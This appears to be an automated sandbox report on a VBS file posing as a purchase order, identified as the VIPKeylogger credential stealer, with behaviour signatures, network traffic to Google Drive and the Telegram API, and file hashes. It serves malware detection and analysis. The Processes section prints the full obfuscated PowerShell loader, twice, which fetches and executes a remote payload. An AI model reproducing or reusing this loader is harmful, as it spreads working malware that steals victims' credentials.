Analysis Overview
SHA256
a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237
Threat Level: Known bad
The file DistribucionesEnelcaJanS.L.PEDIDO456799.vbs was found to be: Known bad.
Malicious Activity Summary
VIPKeylogger
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
outlook_win_path
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
outlook_office_path
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-23 15:03
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-23 15:03
Reported
2024-10-23 15:06
Platform
win10v2004-20241007-en
Max time kernel
147s
Max time network
152s
Command Line
Signatures
VIPKeylogger
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4464 wrote to memory of 4100 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4464 wrote to memory of 4100 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1032 wrote to memory of 4656 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1032 wrote to memory of 4656 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1032 wrote to memory of 4656 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1032 wrote to memory of 4656 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DistribucionesEnelcaJanS.L.PEDIDO456799.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| DE | 193.122.6.168:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 168.6.122.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
memory/4100-0-0x00007FFBD1883000-0x00007FFBD1885000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fsmfcryq.gh4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4100-10-0x000002C005BE0000-0x000002C005C02000-memory.dmp
memory/4100-11-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp
memory/4100-12-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp
memory/4100-15-0x00007FFBD1883000-0x00007FFBD1885000-memory.dmp
memory/4100-16-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp
memory/4100-17-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp
